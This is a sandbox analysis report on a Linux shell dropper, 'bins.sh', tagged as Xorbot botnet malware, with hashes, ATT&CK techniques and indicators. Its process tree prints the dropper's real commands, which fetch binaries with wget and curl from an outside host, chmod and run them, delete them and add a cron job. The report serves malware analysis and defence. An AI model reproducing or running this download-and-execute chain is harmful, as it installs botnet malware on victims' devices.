Analysis
-
max time kernel
149s -
max time network
161s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
28/02/2025, 07:22
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
4cfb0882602e49bb3bb56c54e08029a6
-
SHA1
d60467677204a5e3045c01dca1ff688264ab69b9
-
SHA256
199cd72604764bd453856e029830cce18d0f746a1caae617cbafebda9d785617
-
SHA512
d9a9c852ca4823533dab2b557a096e4055d3665ce8f562b2d0612029ecba77d391811af06e53e55e4fb483589d1009ab948faf0590252578a3f9a143d5c14aef
-
SSDEEP
192:0BBSrBsKwWxWlWYW/W3WB9GurAMMsG253Xy5bz2R95PvExdDPvExdrV3X0bz2R9L:0BBSrBsKwWxWlWYW/W3WB6sG285bz2RF
Malware Config
Signatures
-
resource yara_rule behavioral2/files/fstream-1.dat family_xorbot behavioral2/files/fstream-3.dat family_xorbot behavioral2/files/fstream-5.dat family_xorbot -
Xorbot family
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Contacts a large (1735) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 733 chmod 771 chmod 781 chmod 680 chmod -
Executes dropped EXE 4 IoCs
ioc pid Process /tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb 681 bins.sh /tmp/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL 734 bins.sh /tmp/zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy 772 bins.sh /tmp/6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB 782 bins.sh -
Renames itself 1 IoCs
pid Process 783 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.F48unm crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 4 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/968/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/17/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/646/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/796/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/806/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/929/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/21/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/817/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/847/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/961/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/9/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/830/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/836/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/937/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/789/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/827/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/274/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/794/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/957/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/303/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/841/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/859/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/870/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/105/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/5/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/938/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/822/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/964/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/828/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/868/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/896/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/911/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/8/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/832/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/838/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/933/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/943/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/43/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/780/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/795/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/799/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/854/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/949/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/4/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/591/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/853/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/15/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/863/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/837/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/892/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/108/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/24/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/28/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/930/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/936/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/6/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/940/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/7/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/944/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB File opened for reading /proc/791/cmdline 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB -
System Network Configuration Discovery 1 TTPs 13 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 792 wget 650 wget 669 curl 679 busybox 710 busybox 737 wget 775 wget 684 wget 700 curl 742 curl 752 busybox 776 curl 778 busybox -
Writes file to tmp directory 9 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB curl File opened for modification /tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb wget File opened for modification /tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb busybox File opened for modification /tmp/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL curl File opened for modification /tmp/zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy wget File opened for modification /tmp/zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy curl File opened for modification /tmp/6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB wget File opened for modification /tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb curl File opened for modification /tmp/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL wget
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
- Executes dropped EXE
PID:646 -
/bin/rm/bin/rm bins.sh2⤵PID:648
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:650
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:669
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:679
-
-
/bin/chmodchmod 777 rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb2⤵
- File and Directory Permissions Modification
PID:680
-
-
/tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb./rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb2⤵PID:681
-
-
/bin/rmrm rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb2⤵PID:683
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:684
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
PID:700
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL2⤵
- System Network Configuration Discovery
PID:710
-
-
/bin/chmodchmod 777 bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL./bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL2⤵PID:734
-
-
/bin/rmrm bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL2⤵PID:736
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:737
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:742
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy2⤵
- System Network Configuration Discovery
PID:752
-
-
/bin/chmodchmod 777 zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy./zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy2⤵PID:772
-
-
/bin/rmrm zM6hybHvHVpMiKuXaR8cvu50d6Qtydjffy2⤵PID:774
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:775
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:776
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB2⤵
- System Network Configuration Discovery
PID:778
-
-
/bin/chmodchmod 777 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB./6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB2⤵
- Renames itself
- Reads runtime system information
PID:782 -
/bin/shsh -c "crontab -l"3⤵PID:784
-
/usr/bin/crontabcrontab -l4⤵PID:785
-
-
-
/bin/shsh -c "crontab -"3⤵PID:786
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:787
-
-
-
-
/bin/rmrm 6dZMCGiz1XU3qT3Ri2IY9n3Xq7d0yagyhB2⤵PID:789
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gyAnr1XdiI2ATNkxA7xyQOEEXCMZ1sTD2H2⤵
- System Network Configuration Discovery
PID:792
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
98KB
MD55141342d0df8699fa32a6b066a0c592e
SHA18157673225bd5182f16215e2aa823a25ca2d4fbc
SHA25654302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d
SHA512d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801
-
Filesize
99KB
MD59438d9bc392bcf300a5583b6df5bc8f6
SHA1375a6ae34b516f6f3eeea8030c4084f585017efa
SHA25668e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e
SHA5121f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860
-
Filesize
111KB
MD5ca897a38f23ec23521ce0b1b83f8422d
SHA1b8d2ab335346aba9a72bae0fe3533aca1ab7b66a
SHA256043df61baf17d6a2353b418c5f87eebea4ca1c3fd6b63eaccc34d9bcd0556832
SHA51210d3026b43167121b62786dde231a04e25eb27905989f59a92b5eba92134e30cea554a73e419d3a505e650ee4c474ee407103df335cd84bd8c0f3428ccc16feb
-
Filesize
210B
MD556826eaf19922aacd4557f4f049e6966
SHA1f0ba92e23adf3e24d5292c738b785b7172061bac
SHA256aa8c87722287adc2a56b499ae4ae7389a867eabe4184b9f5283e3d7aeca48e97
SHA512f46e9d125921136d8bb454dc33c215052ec4ba3ca903f36ee8669b6908e8242c3a56495469f3836fa07eac2cc2c9cc337c55f5e1e734ebbb055acee0c6bb9797